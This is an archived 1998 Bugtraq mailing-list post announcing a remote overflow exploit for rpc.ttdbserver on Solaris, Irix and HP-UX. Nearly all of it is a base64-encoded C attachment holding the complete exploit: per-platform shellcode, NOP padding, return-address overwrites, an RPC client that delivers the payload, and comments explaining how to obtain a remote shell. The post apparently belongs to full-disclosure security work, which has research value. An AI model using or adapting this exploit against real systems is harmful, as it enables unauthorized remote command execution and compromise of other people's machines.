Home page logo
/

bugtraq logo Bugtraq mailing list archives

rpc.ttdbserver remote overflow exploit
From: jkwilli2 () UNITY NCSU EDU (Ken Williams)
Date: Mon, 5 Oct 1998 10:38:45 -0400


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

---559023410-851401618-907598325=:11676
Content-Type: TEXT/PLAIN; charset=US-ASCII

-----BEGIN PGP SIGNED MESSAGE-----

Hello,

Attached is rpc.ttdbserver remote overflow exploit code.  Several
versions of Solaris, Irix, and HP-UX are vulnerable.  Read the exploit
code comments for more details.


Regards,

Ken Williams

Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml
E.H.A.P. Corporation  http://www.ehap.org/  ehap () ehap org info () ehap org
NCSU Comp Sci Dept    http://www.csc.ncsu.edu/ jkwilli2 () adm csc ncsu edu
PGP DSS/DH/RSA Keys   http://www4.ncsu.edu/~jkwilli2/pgpkey/


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNhjZSZDw1ZsNz1IXAQFdtQgAlA3EjMrhqGjAxDn2H81yyzWXGDMcJlFO
nqGVz2skfR61U54NeG3La4mrg3BpaTpE2F5APfR7uR/ot4l+utva+1MBs3HUpTAS
sc8fx9Co10Biy1W6eLqfL3yCGDado5L+qdJdApC1DjMqg+5PiFr8+bRwIwakneDL
z0Txo0nBq7vi9/oWi1/K2Xa3miHHM0l5wybYjhC78nwaBXFw5zX01xh8byZBCrUP
omZE+Wd41Lovk7d3oU2IMCu5O9nEJM1SMcatpL6i5wWv5+6V9w0d8KrFpGijLD3v
Vzgh+/elOMem8FFl693JmOrvlg4/gwSGow9X4+UPyUX0TrNSJvHApw==
=+SeW
-----END PGP SIGNATURE-----

---559023410-851401618-907598325=:11676
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rpc.ttdbserver.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SOL.4.02A.9810051038450.11676 () c00985-224wi eos ncsu edu>
Content-Description:
Content-Disposition: attachment; filename="rpc.ttdbserver.c"

LyoNCg0KIEF1dGhvciBVbmtub3duDQoNCiAtIFBhY2tldCBTdG9ybSBJbmZv
cm1hdGlvbiBTZWN1cml0eSBBcmNoaXZlcw0KIC0gaHR0cDovL3d3dy5nZW5v
Y2lkZTI2MDAuY29tL350YXR0b29tYW4vaW5kZXguc2h0bWwNCiAtIEtlbiBX
aWxsaWFtcywgcGFja2V0c3Rvcm1AZ2Vub2NpZGUyNjAwLmNvbQ0KDQogcnBj
LnR0ZGJzZXJ2ZXIgcmVtb3RlIG92ZXJmbG93LCBhcGsNCiBTb2xhcmlzICh0
ZXN0ZWQgb24gU1M1IGFuZCBVbHRyYSAyLjUuMSkNCiBJcml4ICh0ZXN0ZWQg
b24gcjVrIGFuZCByMTBrIE8yIDYuMyksIA0KIEhQLVVYICggdGVzdGVkIG9u
IDcwMHMgMTAuMjApDQoNCiB1c2FnZTogLi9yIFsta3VdIFstcCBwb3J0XSBb
LWYgb3V0ZmlsZV0gaG9zdCBjbWQNCiAgICAgICAgICAgLWsgOiBraWxsIHR0
ZGJzZXJ2ZXIgKHJlYWQgYmVsb3cpDQogICAgICAgICAgIC11IDogdXNlIFVE
UCAoZGVmYXVsdCBUQ1ApDQogICAgICAgICAgIC1wIHBvcnQgOiBjb25uZWN0
IHRvIHR0ZGJzZXJ2ZXIgYXQgcG9ydCAoZG9uJ3QgYXNrIHBvcnRtYXApDQog
ICAgICAgICAgIC1mIG91dGZpbGUgOiBzdG9yZSBycGMgbWVzc2FnZSBpbiBv
dXRmaWxlIChhbmQgZG8gTk9UIGNvbnRhY3QgaG9zdCkNCg0KIG5vdGU6DQog
ICBpdCBzaG91bGQgY29tcGlsZSBvbiBhbnkgbm9ybWFsIHN5c3RlbSwgdG8g
Z2V0IEhQLVVYIGV4cGxvaXQgY29tcGlsZSB3aXRoIA0KICAgICAtREhQVVgs
IGZvciBTb2xhcmlzIC1EU09MQVJJUywgZm9yIElyaXggdXNlIC1ESVJJWA0K
ICAgY21kIGlzIHJ1biB0aHJvdWdoIHNoIC1jLCBhbmQgdGhlcmUgaXMgbm8g
cHJhY3RpY2FsIGxpbWl0IGZvciBjb21tYW5kIA0KICAgICBsZW5ndGgsIGJ1
dCBpdCBoYXMgdG8gZml0IGluIGJ1ZmZlciAoMTAyNCBieXRlcyBpbiB0aGlz
IGNhc2UpLCANCiAgICAgYW5kIH4oc3RybGVuICsgMSkgY2Fubm90IGNvbnRh
aW4gJzAnDQogICBieSBkZWZhdWx0IHR0ZGJzZXJ2ZXIgcnVucyBmcm9tIGlu
ZXRkLCBzbyBpdCB3aWxsIGJlIHJlc3Bhd25lZCBlYWNoIHRpbWUNCiAgICAg
aXQgZGllIChJIG1lYW4gZXhlY3V0ZSBjb21tYW5kKSwgYWxzbyBiZWNhdXNl
IGl0IGRpZXMgY29ycmVjdCByZXBseSBpcw0KICAgICBjbG50X2NhbGwgZXJy
b3IgKGNvbm5lY3Rpb24gcmVzZXQsIHRpbWVvdXQgZXRjKQ0KICAgLWYgZmls
ZSBvcHRpb246IE9uIEhQLVVYIGFuZCBJcml4LCBjb25uZWN0ZWQgc29ja2V0
IGdldHMgZmlyc3QgZnJlZQ0KICAgICBkZXNjcmlwdG9yLCAzIG9uIEhQLVVY
IGFuZCA1IG9uIElyaXguIFlvdSBjYW4gdXNlIC1mIG9wdGlvbiB0byBzdG9y
ZQ0KICAgICBkYXRhZ3JhbSB0byBmaWxlLCBhbmQgc2VuZCBpdCB0byB0dGRi
c2VydmVyIHdpdGggeW91ciB0ZWxuZXQgb2YgDQogICAgIGNob2ljZS4gIFdp
dGggY29tbWFuZCBsaWtlICIwPCYzIDE+JjMgMj4mMyBleGVjIHNoIiBvbiBI
UC1VWCB5b3UnbGwgZ2V0DQogICAgIHJlbW90ZSBzaGVsbCBydW5uaW5nLiBT
b2xhcmlzIGR1cCgpIGNvbm5lY3RlZCBmZCB0byBmaXJzdCBmcmVlIG9uZQ0K
ICAgICBvdmVyIDI1Niwgc28geW91IGhhdmUgdG8gc3R1ZHkgc2ggbWFuIHBh
Z2UgdG8gZmluZCBhIHdheSB0byBkbyB0aGlzIDxnPg0KICAgICBZb3Ugc2hv
dWxkIGtpbGwgdHRkYnNlcnZlciBiZWZvcmUsIHRvIG1ha2Ugc3VyZSBpdCBk
b2Vzbid0IGhhdmUNCiAgICAgYW55IGZpbGVzIG9wZW4gZXhjZXB0IDAtMiBm
ZHMgcGFzc2VkIGZyb20gaW5ldGQuIEFjdHVhbGx5IG9uIElyaXgNCiAgICAg
aXQgbG9va3MgbGlrZSBmdWNrZWQgdXAsIHR0ZGJzZXJ2ZXIgZ2V0cyAwLTIg
ZmRzIGZyb20gaW5ldGQsIGlnbm9yZXMNCiAgICAgdGhlbSBhbmQgb3BlbnMg
bmV3IG9uZXMgYXMgMyBhbmQgNCBmZCwgc28geW91IG5lZWQgdG8gcmVkaXJl
Y3QgNXRoIGZkLg0KICAgICBJdCBoYXBwZW5zIG9uIDYuMyBhdCBsZWFzdCwg
SSBuZWVkIHRvIGxvb2sgYXQgb3RoZXIgdmVyc2lvbnMuDQogICAgIElyaXgg
aXMgYWxzbyB0aGUgb25seSBvbmUgSSBzYXcgd2hpY2ggc3VwcG9ydHMgdHRk
YnNlcnZlciBvdmVyIFVEUCwNCiAgICAga2VlcCBpbiBtaW5kIHRoYXQgYnkg
ZGVmYXVsdCBnZW5lcmF0ZWQgUlBDIGRhdGFncmFtIGlzIFRDUCB2ZXJzaW9u
IHdpdGgNCiAgICAgcmVjb3JkIG1hcmtpbmcsIHlvdSBzaG91bGQgdXNlIC11
IG9wdGlvbiB0byBnZXQgVURQIHZlcnNpb24gKG9yIGp1c3QgcmVtb3ZlDQog
ICAgIGZpcnN0IGZvdXIgYnl0ZXMgZnJvbSBnZW5lcmF0ZWQgZmlsZSkNCiAg
Zm9yIHJlYXNvbnMgSSBjYW4ndCBxdWl0ZSB1bmRlcnN0YW5kLCB5b3UgX2hh
dmVfIHRvIGtpbCB0dGRic2VydmVyIG9uIFNvbGFyaXMNCiAgICBiZWZvcmUg
c2VuZGluZyBhIGNvbW1hbmQgdGhlcmUuIFdoZW4gdHRkYnNlcnZlciBoYXMg
Y29ubmVjdGVkIGNsaWVudHMsDQogICAgaXQgc2ltcGx5IHJldHVybnMgYW4g
ZXJyb3IgKGZpbGVuYW1lIHRvbyBsb25nKS4gSW4gYm90aCBjYXNlcw0KICAg
IGl0IGxvb2tzIGxpa2UgdGhlIHByb2dyYW0gZ29lcyB0aHJvdWdoIHRoZSBz
YW1lIHdheSwgd2VsbCwgbWF5YmUgSSdsbA0KICAgIGdldCBhIGNsdWUgb25l
IGRheSB3aGF0IGhhcHBlbnMgdGhlcmUuDQogIE9uIElyaXggdG8gZ2V0IG92
ZXIgaXRzIGZ1Y2tlZCB1cCBjYWNoZSwgSSBzaW1wbHkgc2VuZCBsaWtlIDIw
a2IgdG8gbWFrZQ0KICAgIGl0IGZsdXNoZWQsIHNvIGl0J3Mgbm90IHJlbGlh
YmxlLiBZb3UgY2FuIGZpbmQgYSBidWZmZXIgYWxsb2NhdGVkIGJ5IHhkciAN
CiAgICBhbmQgaXQgc2hvdWxkIGJlIGJldHRlci4gDQogIHN1cnByaXppbmds
eSB0aGVyZSBhcmUgc29tZSBkaWZmZXJlbmNlcyBiZXR3ZWVuIHR0ZGJzZXJ2
ZXIgb24gYWJvdmUgcGxhdGZvcm1zLA0KICAgIGxpa2Ugc29sYXJpcyBkdXAo
KSBvZiBmZHMsIHN0YXJ0LXVwIElyaXggYmVoYXZpb3VyLCB0aGUgZmFjdCB0
aGF0DQogICAgb24gSXJpeCBpdCBmaXJzdCB0cmllcyBjaGRpciB0byBkaXJl
Y3RvcnkgdGhlbiBkbyBzb21lIHRhc2sgKGl0J3MgdGhlDQogICAgcmVhc29u
IEkgaGF2ZSB0byBhZGQgIi9mIiBhdCB0aGUgZW5kIG9mIGJ1ZmZlciB0byBo
YXZlIGl0IGNvcHkgb3ZlcmZsb3cNCiAgICBwYXJ0IG9mIHRoZSBidWZmZXIg
b24gc3RhY2spIGV0Yy4gVGhhdCdzIHdoeSBpdCBtYXkgbm90IHdvcmsgb24g
b3RoZXINCiAgICBzeXN0ZW1zIGFuZCB2ZXJzaW9ucyB0aGFuIG1lbnRpb25l
ZCBhdCB0aGUgYmVnaW5uaW5nLg0KDQogKi8NCg0KI2luY2x1ZGUgPHN5cy90
eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lz
L3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRl
IDxhcnBhL2luZXQuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUg
PHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8c3Rk
bGliLmg+DQojaW5jbHVkZSA8ZXJybm8uaD4NCiNpbmNsdWRlIDxzdHJpbmcu
aD4NCiNpbmNsdWRlIDxuZXRkYi5oPg0KI2luY2x1ZGUgPHJwYy9ycGMuaD4N
Cg0KI2RlZmluZSBQT1JUIDANCiNkZWZpbmUgQlNJWkUgMTAyNA0KDQojaWYg
ZGVmaW5lZChTT0xBUklTKQ0KIyBkZWZpbmUgU1AgMHhlZmZmZDYxOA0KIyBk
ZWZpbmUgTEVOT0ZTIDgwDQpjaGFyIGFzbWNvZGVbXT0iXHgyMFx4YmZceGZm
XHhmZlx4MjBceGJmXHhmZlx4ZmZceDdmXHhmZlx4ZmZceGZmXHg5Mlx4MDNc
eGUwXHg0OFx4OTBceDAyXHg2MFx4MTBceGUwXHgwMlx4M2ZceGYwXHhhMlx4
ODBceDNmXHhmZlx4YTBceDI0XHg0MFx4MTBceGQwXHgyMlx4M2ZceGYwXHhj
MFx4MjJceDNmXHhmY1x4YTJceDAyXHgyMFx4MDlceGMwXHgyY1x4N2ZceGZm
XHhlMlx4MjJceDNmXHhmNFx4YTJceDA0XHg2MFx4MDNceGMwXHgyY1x4N2Zc
eGZmXHhlMlx4MjJceDNmXHhmOFx4YTJceDA0XHg0MFx4MTBceGMwXHgyY1x4
N2ZceGZmXHg4Mlx4MTBceDIwXHgwYlx4OTFceGQwXHgyMFx4MDhceGZmXHhm
Zlx4ZmZceGZjXHgyMlx4MjJceDIyXHgyMlx4MzNceDMzXHgzM1x4MzNceDQ0
XHg0NFx4NDRceDQ0XHgyZlx4NjJceDY5XHg2ZVx4MmZceDZiXHg3M1x4Njhc
eDJlXHgyZFx4NjNceDJlIjsNCmNoYXIgTk9QW109Ilx4ODBceDFjXHg0MFx4
MTEiOw0KI2VuZGlmDQoNCiNpZiBkZWZpbmVkKEhQVVgpDQojIGRlZmluZSBT
UCAweDdiMDNjYzEwDQojIGRlZmluZSBMRU5PRlMgODQNCmNoYXIgYXNtY29k
ZVtdPSJceGViXHg0MFx4NDBceDAyXHgwYlx4MzlceDAyXHg4MFx4ZDdceDQw
XHgwY1x4MWVceGI3XHg1YVx4MjBceGI4XHgwYlx4NWFceDAyXHg1OVx4MGZc
eDIxXHgxMFx4OThceDk3XHgxOFx4MDdceGZmXHgwZlx4MzlceDEyXHg4MVx4
MGZceDIwXHgxMlx4OTlceGI3XHgzOVx4MjBceDEwXHgwZlx4MjBceDEyXHgx
Zlx4MGZceDU5XHgxMlx4ODlceGI3XHgzOVx4MjBceDA2XHgwZlx4MjBceDEy
XHgxZlx4MGZceDU5XHgxMlx4OTFceDBiXHgzOFx4MDZceDE5XHgwZlx4MjBc
eDEyXHgxZlx4YjdceDU5XHgwN1x4ZTFceDIwXHgyMFx4MDhceDAxXHhlNFx4
MjBceGUwXHgwOFx4YjRceDE2XHgxMFx4MTZceDExXHgxMVx4MTFceDExXHgy
Mlx4MjJceDIyXHgyMlx4MzNceDMzXHgzM1x4MzNceDQ0XHg0NFx4NDRceDQ0
XHgyZlx4NjJceDY5XHg2ZVx4MmZceDczXHg2OFx4MmVceDJkXHg2M1x4MmUi
Ow0KY2hhciBOT1BbXT0iXHgwYlx4MzlceDAyXHg4MCI7DQojZW5kaWYNCg0K
I2lmIGRlZmluZWQoSVJJWCkNCiMgZGVmaW5lIFNQIDB4N2ZmZjFiMzANCiMg
ZGVmaW5lIExFTk9GUyA3Ng0KY2hhciBhc21jb2RlW109Ilx4MDRceDEwXHhm
Zlx4ZmZceDI3XHhlNFx4MDFceDAxXHgyNFx4ODRceGZmXHg1ZVx4OGNceDhj
XHhmZlx4ZTVceDI0XHgwZFx4ZmZceGZmXHgwMVx4YWNceDYwXHgyM1x4MDFc
eDg0XHg2MFx4MjBceGExXHg4MFx4ZmZceGZmXHhhMFx4ODBceGZmXHhmZlx4
YWNceDg0XHhmZlx4ZWRceDI0XHg4NFx4ZmZceGZkXHhhMFx4ODBceGZmXHhm
Zlx4YWNceDg0XHhmZlx4ZWNceDI0XHg4NFx4ZmZceGY4XHgyNFx4ODVceGZm
XHhmMFx4YWNceDg0XHhmZlx4ZjBceGFjXHg4MFx4ZmZceGZjXHgyNFx4MDJc
eDAzXHhmM1x4MDJceDA0XHg4ZFx4MGNceGZmXHhmZlx4ZmZceGZjXHgyMlx4
MjJceDIyXHgyMlx4MjJceDIyXHgyMlx4MjJceDIyXHgyMlx4MjJceDIyXHgy
Zlx4NjJceDY5XHg2ZVx4MmZceDczXHg2OFx4MmVceDJkXHg2M1x4MmUiOw0K
Y2hhciBOT1BbXT0iXHgyNFx4MGZceDEyXHgzNCI7DQoNCiNlbmRpZg0KDQoj
ZGVmaW5lIFRUX0RCU0VSVkVSX1BST0cgMTAwMDgzDQojZGVmaW5lIFRUX0RC
U0VSVkVSX1ZFUlMgMQ0KI2RlZmluZSBfVFRfUCA3DQoNCnN0cnVjdCB0dF9y
ZXBseSB7DQogIGludCBpMTsNCiAgaW50IGkyOw0KfTsNCg0Kdm9pZCB1c2Fn
ZShjaGFyICpzKSB7DQogIHByaW50ZigiVXNhZ2U6ICVzIFsta3VdIFstcCBw
b3J0XSBbLWYgb3V0ZmlsZV0gaG9zdCBjbWRcbiIsIHMpOw0KICBleGl0KDAp
Ow0KfQ0KDQpib29sX3QgeGRyX3R0X3JlcGx5KFhEUiAqeGRycywgc3RydWN0
IHR0X3JlcGx5ICpvYmpwKSB7DQoNCiAgaWYgKCF4ZHJfaW50KHhkcnMsICZv
YmpwLT5pMSkpDQogICAgcmV0dXJuIChGQUxTRSk7DQogIGlmICgheGRyX2lu
dCh4ZHJzLCAmb2JqcC0+aTIpKSANCiAgICByZXR1cm4gKEZBTFNFKTsNCiAg
cmV0dXJuIChUUlVFKTsNCn0NCg0Kdm9pZCBtYWtlX2ZpbGUoY2hhciAqZm5h
bWUsIGNoYXIgKmJ1ZiwgaW50IHR5cGUpOw0KDQptYWluKGludCBhcmdjLCBj
aGFyICphcmd2W10pIHsNCiAgZXh0ZXJuIGludCBvcHRpbmQ7DQogIGV4dGVy
biBjaGFyICpvcHRhcmc7DQogIENMSUVOVCAqY2w7DQogIGVudW0gY2xudF9z
dGF0IHN0YXQ7DQogIHN0cnVjdCB0aW1ldmFsIHRtOw0KICBzdHJ1Y3QgaG9z
dGVudCAqaHA7DQogIHN0cnVjdCBzb2NrYWRkcl9pbiB0YXJnZXQ7DQogIHN0
cnVjdCB0dF9yZXBseSBvcF9yZXM7DQogIGNoYXIgYnVmWzY0MDAwXSwgKnBh
dGgsICpjbWQsICpob3N0LCAqYnAsICpvdXRmaWxlID0gTlVMTDsNCiAgaW50
IHNkLCBpLCBzcCA9IFNQLCBic2l6ZSA9IEJTSVpFLCBwb3J0ID0gUE9SVCwg
a2lsbCA9IDAsIHByb3RvID0gMDsNCg0KICB3aGlsZSAoKGkgPSBnZXRvcHQo
YXJnYywgYXJndiwgInVrcDpmOiIpKSAhPSBFT0YpDQogICAgc3dpdGNoIChp
KSB7DQogICAgICBjYXNlICdwJzoNCiAgICAgICAgcG9ydCA9IGF0b2kob3B0
YXJnKTsNCiAgICAgICAgYnJlYWs7DQogICAgICBjYXNlICdrJzoNCiAgICAg
ICAga2lsbCA9IDE7DQogICAgICAgIGJyZWFrOw0KICAgICAgY2FzZSAndSc6
DQogICAgICAgIHByb3RvID0gMTsNCiAgICAgICAgYnJlYWs7DQogICAgICBj
YXNlICdmJzoNCiAgICAgICAgb3V0ZmlsZSA9IG9wdGFyZzsNCiAgICAgICAg
YnJlYWs7DQogICAgICBkZWZhdWx0Og0KICAgICAgICB1c2FnZShhcmd2WzBd
KTsNCiAgICB9DQogIGlmIChhcmdjIC0gb3B0aW5kIDwgMikNCiAgICB1c2Fn
ZShhcmd2WzBdKTsNCiAgY21kID0gYXJndltvcHRpbmQgKyAxXTsNCiAgaG9z
dCA9IGFyZ3Zbb3B0aW5kXTsNCg0KICBmb3IgKGkgPSAwOyBpIDwgc2l6ZW9m
KGJ1Zik7IGkrKykNCiAgICAqKGJ1ZiArIGkpID0gTk9QW2kgJSA0XTsNCg0K
ICBpID0gYnNpemUgLSBzdHJsZW4oYXNtY29kZSkgLSBzdHJsZW4oY21kKTsN
CiAgaSAmPSAweGZmZmZmZmZjOw0KICBzdHJjcHkoYnVmICsgaSwgYXNtY29k
ZSk7DQogIHN0cmNhdChidWYsIGNtZCk7DQogICooaW50ICopKGJ1ZiArIGkg
KyBMRU5PRlMpID0gfihzdHJsZW4oY21kKSArIDEpOw0KICBidWZbc3RybGVu
KGJ1ZildID0gJy4nOw0KICBicCA9IGJ1ZiArIGJzaXplOw0KICBmb3IgKGkg
PSAwOyBpIDwgMTY7IGJwKz00LCBpKyspDQogICAgKihpbnQgKilicCA9IHNw
Ow0KI2lmZGVmIElSSVgNCiAgc3AgPSBzcCArIDQwMCArIDMxNjUyOw0KICBm
b3IgKGkgPSAwOyBpIDwgNTAwMDsgYnArPTQsIGkrKykNCiAgICAqKGludCAq
KWJwID0gc3A7DQogICpicCsrID0gJy8nOw0KICAqYnArKyA9ICdmJzsNCiAg
cGF0aCA9IGJ1ZiArIDI7DQojZWxzZQ0KICBwYXRoID0gYnVmOw0KI2VuZGlm
DQogICpicCA9IDA7DQoNCiAgaWYgKG91dGZpbGUpIHsNCiAgICBtYWtlX2Zp
bGUob3V0ZmlsZSwgYnVmLCBwcm90byk7DQogICAgcHJpbnRmKCJycGMgZGF0
YWdyYW0gc3RvcmVkIGluICVzXG4iLCBvdXRmaWxlKTsNCiAgICBleGl0KDAp
Ow0KICB9DQoNCiAgaWYgKCh0YXJnZXQuc2luX2FkZHIuc19hZGRyID0gaW5l
dF9hZGRyKGhvc3QpKSA9PSAtMSkgew0KICAgIGlmICgoaHAgPSBnZXRob3N0
YnluYW1lKGhvc3QpKSA9PSBOVUxMKSB7DQogICAgICBwcmludGYoIiVzOiBj
YW5ub3QgcmVzb2x2ZVxuIiwgaG9zdCk7DQogICAgICBleGl0KDEpOyANCiAg
ICB9IGVsc2UNCiAgICAgIHRhcmdldC5zaW5fYWRkci5zX2FkZHIgPSAqKHVf
bG9uZyAqKWhwLT5oX2FkZHI7DQogIH0NCiAgdGFyZ2V0LnNpbl9mYW1pbHkg
PSBBRl9JTkVUOw0KICB0YXJnZXQuc2luX3BvcnQgPSBodG9ucyhwb3J0KTsN
CiAgc2QgPSBSUENfQU5ZU09DSzsNCg0KICB0bS50dl9zZWMgPSA0Ow0KICB0
bS50dl91c2VjID0gMDsNCiAgaWYgKHByb3RvKSANCiAgICBjbCA9IGNsbnR1
ZHBfY3JlYXRlKCZ0YXJnZXQsIFRUX0RCU0VSVkVSX1BST0csIFRUX0RCU0VS
VkVSX1ZFUlMsIHRtLCAmc2QpOw0KICBlbHNlDQogICAgY2wgPSBjbG50dGNw
X2NyZWF0ZSgmdGFyZ2V0LCBUVF9EQlNFUlZFUl9QUk9HLCBUVF9EQlNFUlZF
Ul9WRVJTLCAmc2QsIDAsIDApOw0KICBpZiAoY2wgPT0gTlVMTCkgew0KICAg
IGNsbnRfcGNyZWF0ZWVycm9yKCJjbG50X2NyZWF0ZSIpOw0KICAgIGV4aXQo
MCk7DQogIH0NCiAgY2wtPmNsX2F1dGggPSBhdXRodW5peF9jcmVhdGUoImxv
Y2FsaG9zdCIsIDAsIDAsIDAsIE5VTEwpOw0KICB0bS50dl9zZWMgPSAxMDsN
Cg0KICBpZiAoa2lsbCkgew0KICAgIHBhdGggPSBOVUxMOw0KICAgIGJwID0g
TlVMTDsNCiAgICBpZiAoKHN0YXQgPSBjbG50X2NhbGwoY2wsIDE1LCB4ZHJf
d3JhcHN0cmluZywgKGNoYXIgKikmcGF0aCwgDQogICAgICAgIHhkcl93cmFw
c3RyaW5nLCAoY2hhciAqKSZicCwgdG0pKSAhPSBSUENfU1VDQ0VTUykgew0K
ICAgICAgY2xudF9wZXJyb3IoY2wsICJjbG50X2NhbGwiKTsNCiAgICAgIGV4
aXQoMSk7DQogICAgfQ0KICAgIHByaW50ZigiQ291bGQgbm90IGtpbGwgdHRk
YnNlcnZlciwgcmVwbHkgaXM6ICVzXG4iLCBicCk7DQogICAgZXhpdCgxKTsN
CiAgfQ0KDQogIGlmICgoc3RhdCA9IGNsbnRfY2FsbChjbCwgX1RUX1AsIHhk
cl93cmFwc3RyaW5nLCAoY2hhciAqKSZwYXRoLCB4ZHJfdHRfcmVwbHksIA0K
ICAgICAgIChjaGFyICopJm9wX3JlcywgdG0pKSAhPSBSUENfU1VDQ0VTUykg
ew0KICAgIGNsbnRfcGVycm9yKGNsLCAiY2xudF9jYWxsIik7DQogICAgZXhp
dCgxKTsNCiAgfQ0KICBwcmludGYoInJlcyBpMSAlZCwgcmVzIGkyICVkXG4i
LCBvcF9yZXMuaTEsIG9wX3Jlcy5pMik7DQogIGNsbnRfZGVzdHJveShjbCk7
DQp9DQoNCnZvaWQgbWFrZV9maWxlKGNoYXIgKmZuYW1lLCBjaGFyICpidWYs
IGludCB0eXBlKSB7DQogIGludCBmZCwgb2ZmczsNCiAgWERSIHhkcm07DQog
IHN0cnVjdCBycGNfbXNnIHJwY19oZHI7DQogIHN0cnVjdCBhdXRodW5peF9w
YXJtcyBhdXA7DQogIGNoYXIgZGdyYW1bNjQwMDBdLCByYXV0aFtNQVhfQVVU
SF9CWVRFU107DQoNCiAgaWYgKHR5cGUgPT0gMSkgLyogVURQICovDQogICAg
b2ZmcyA9IDQ7DQogIGlmICgoZmQgPSBvcGVuKGZuYW1lLCBPX1JEV1IgfCBP
X0NSRUFUIHwgT19UUlVOQywgMDY2NikpID09IC0xKSB7DQogICAgcGVycm9y
KGZuYW1lKTsNCiAgICBleGl0KDEpOw0KICB9DQogIHhkcm1lbV9jcmVhdGUo
Jnhkcm0sIHJhdXRoLCBzaXplb2YocmF1dGgpLCBYRFJfRU5DT0RFKTsNCiAg
YXVwLmF1cF90aW1lID0gKHVfbG9uZyl0aW1lKE5VTEwpOw0KICBhdXAuYXVw
X21hY2huYW1lID0gImxvY2FsaG9zdCI7DQogIGF1cC5hdXBfdWlkID0gMDsN
CiAgYXVwLmF1cF9naWQgPSAwOw0KICBhdXAuYXVwX2xlbiA9IDA7DQogIGF1
cC5hdXBfZ2lkcyA9IE5VTEw7DQogIGlmICh4ZHJfYXV0aHVuaXhfcGFybXMo
Jnhkcm0sICZhdXApID09IEZBTFNFKSB7DQogICAgcHJpbnRmKCJlcnJvciBl
bmNvZGluZyBhdXRoIGNyZWRcbiIpOw0KICAgIGV4aXQoMSk7DQogIH0NCiAg
cnBjX2hkci5ybV9jYWxsLmNiX2NyZWQub2FfbGVuZ3RoID0geGRyX2dldHBv
cygmeGRybSk7DQogIHhkcl9kZXN0cm95KCZ4ZHJtKTsNCiAgeGRybWVtX2Ny
ZWF0ZSgmeGRybSwgZGdyYW0gKyA0LCBzaXplb2YoZGdyYW0pLCBYRFJfRU5D
T0RFKTsNCiAgcnBjX2hkci5ybV94aWQgPSAweDEyMzQ1Njc4Ow0KICBycGNf
aGRyLnJtX2RpcmVjdGlvbiA9IENBTEw7DQogIHJwY19oZHIucm1fY2FsbC5j
Yl9ycGN2ZXJzID0gMjsNCiAgcnBjX2hkci5ybV9jYWxsLmNiX3Byb2cgPSBU
VF9EQlNFUlZFUl9QUk9HOw0KICBycGNfaGRyLnJtX2NhbGwuY2JfdmVycyA9
IFRUX0RCU0VSVkVSX1ZFUlM7DQogIHJwY19oZHIucm1fY2FsbC5jYl9wcm9j
ID0gX1RUX1A7DQogIHJwY19oZHIucm1fY2FsbC5jYl9jcmVkLm9hX2ZsYXZv
ciA9IEFVVEhfVU5JWDsNCiAgcnBjX2hkci5ybV9jYWxsLmNiX2NyZWQub2Ff
YmFzZSA9IHJhdXRoOw0KICBycGNfaGRyLnJtX2NhbGwuY2JfdmVyZi5vYV9m
bGF2b3IgPSBBVVRIX05PTkU7DQogIHJwY19oZHIucm1fY2FsbC5jYl92ZXJm
Lm9hX2Jhc2UgPSBOVUxMOw0KICBycGNfaGRyLnJtX2NhbGwuY2JfdmVyZi5v
YV9sZW5ndGggPSAwOw0KICBpZiAoeGRyX2NhbGxtc2coJnhkcm0sICZycGNf
aGRyKSA9PSBGQUxTRSkgew0KICAgIHByaW50ZigiZXJyb3IgZW5jb2Rpbmcg
cnBjIGhlYWRlclxuIik7DQogICAgZXhpdCgxKTsNCiAgfQ0KICBpZiAoeGRy
X3dyYXBzdHJpbmcoJnhkcm0sICZidWYpID09IEZBTFNFKSB7DQogICAgcHJp
bnRmKCJlcnJvciBlbmNvZGluZyBycGMgZGF0YVxuIik7DQogICAgZXhpdCgx
KTsNCiAgfQ0KICAvKiByZWNvcmQgbWFya2luZyAqLw0KICAqKHVfaW50ICop
ZGdyYW0gPSAweDgwMDAwMDAwIHwgeGRyX2dldHBvcygmeGRybSk7DQogIGlm
ICh3cml0ZShmZCwgZGdyYW0gKyBvZmZzLCB4ZHJfZ2V0cG9zKCZ4ZHJtKSAr
IDQpID09IC0xKSB7DQogICAgcGVycm9yKCJ3cml0ZSIpOw0KICAgIGV4aXQo
MSk7DQogIH0NCiAgeGRyX2Rlc3Ryb3koJnhkcm0pOw0KICBjbG9zZShmZCk7
DQp9DQo=
---559023410-851401618-907598325=:11676--



  By Date           By Thread  

Current thread:
  • rpc.ttdbserver remote overflow exploit Ken Williams (Oct 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault